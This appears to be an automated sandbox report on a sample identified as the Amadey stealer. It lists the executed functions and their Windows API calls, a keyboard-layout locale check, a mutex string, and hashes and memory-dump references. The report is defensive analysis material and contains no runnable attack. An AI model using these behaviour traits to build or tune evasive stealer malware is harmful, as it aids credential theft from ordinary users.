Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.1959422053.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.5%
Total number of Nodes:	715
Total number of Limit Nodes:	36

Executed Functions

Function 002D5C83 Relevance: 20.8, APIs: 3, Strings: 8, Instructions: 1535registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,488B5222,488B5222), ref: 002D5DCC
RegQueryValueExA.KERNEL32(488B5222,?,00000000,00000000,?,00000400,?,?,00000000,00000001,488B5222,488B5222), ref: 002D5DFA
RegCloseKey.KERNEL32(488B5222,?,?,00000000,00000001,488B5222,488B5222), ref: 002D5E06

Strings

00000423, xrefs: 002D60FA
0000043f, xrefs: 002D612B
00000419, xrefs: 002D6098
00000422, xrefs: 002D60C9
invalid stoi argument, xrefs: 002D7090
stoi argument out of range, xrefs: 002D7081
Keyboard Layout\Preload, xrefs: 002D6054
VUUU, xrefs: 002D6F41

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
API String ID: 3677997916-1112634906
Opcode ID: 27dd655225a0850f4db5c59ab1d28e4242dd54390765bb4515e93ba0bf3d1fe2
Instruction ID: 43c6111f1a8d0e6efb2bd80b3a870790a08759beae93960fbeb8987337d0e169
Opcode Fuzzy Hash: 27dd655225a0850f4db5c59ab1d28e4242dd54390765bb4515e93ba0bf3d1fe2
Instruction Fuzzy Hash: 11C20171A101589BDF28DF68DC89BEDB779EF44300F50429AE409A72C2DB759EA4CF90

Function 002D735A Relevance: 2.5, APIs: 1, Instructions: 1031
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: ConditionVariableWake
String ID:
API String ID: 1192502693-0
Opcode ID: 6160e6a32d8ec37b58718b8da806191a024a01a98541ff6f699814c81b5d3013
Instruction ID: d00581901cd729cb179b754882053b51674d7aaa303e73b2aa55acaca1300274
Opcode Fuzzy Hash: 6160e6a32d8ec37b58718b8da806191a024a01a98541ff6f699814c81b5d3013
Instruction Fuzzy Hash: FD726B71A202849BEB09DF28DC86BDDBB79EF45300F50465EF814973C1EB399E948B91

Function 0030652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0030652A,?,?,?,?,?,00307661), ref: 00306567

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e1364e5dbc74a7c432d54d9c0f9208bc041f53572b3f400c9bbc693ffc29e72d
Instruction ID: 919e572363387a254e571db59cbb585350a555be97fc0b611780fde7153b4ab0
Opcode Fuzzy Hash: e1364e5dbc74a7c432d54d9c0f9208bc041f53572b3f400c9bbc693ffc29e72d
Instruction Fuzzy Hash: 08E08C30102608AFCE26BB18DC3EE993B29EF42742F100905F8184A666CB35ED91C681

Function 054A0576 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1469582370.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_UyiH4t5dph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d05f8af3b822bf4069a170df503d5ed8506e9d3bd9f285a42acbfd98096255f7
Instruction ID: 6a5b3c79e0b9fc6c0fc242b4d7de01f4c2e93c9cd153adcae1731711e129a869
Opcode Fuzzy Hash: d05f8af3b822bf4069a170df503d5ed8506e9d3bd9f285a42acbfd98096255f7
Instruction Fuzzy Hash: 4901FFBB00C110FE61C2C9232B1CAFA272BE1F63347709023F40F8A451D2648A6B9431

Function 002D5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

00000423, xrefs: 002D60FA
0000043f, xrefs: 002D612B
00000419, xrefs: 002D6098
00000422, xrefs: 002D60C9
Keyboard Layout\Preload, xrefs: 002D6054

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 496bbb9d1b5e683dd2c6a873fa24011b04a1ac84e96dab6f1cb39c3dd970a899
Instruction ID: 62c9e536b92ceda1087e794f51f77b846578e86a6152de92972d0a64b6aa188a
Opcode Fuzzy Hash: 496bbb9d1b5e683dd2c6a873fa24011b04a1ac84e96dab6f1cb39c3dd970a899
Instruction Fuzzy Hash: F6F1D0709102589BEB24DF54CC85BDEBBB9EF44304F5042AAF508A7381DBB49E98CF94

Function 002D9BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: a2d5beecd38f6a967b44377a05689cf42f0d93107222bf55038877559b8f4801
Instruction ID: 75d8b34ee97f085ea7176d521c9cfba9c39000ec2cecec5c23fa03c21318d5b0
Opcode Fuzzy Hash: a2d5beecd38f6a967b44377a05689cf42f0d93107222bf55038877559b8f4801
Instruction Fuzzy Hash: C53128317642408BEB08EB78EC89B9EB766DB85314F20861BF018973E5C7758DE08751

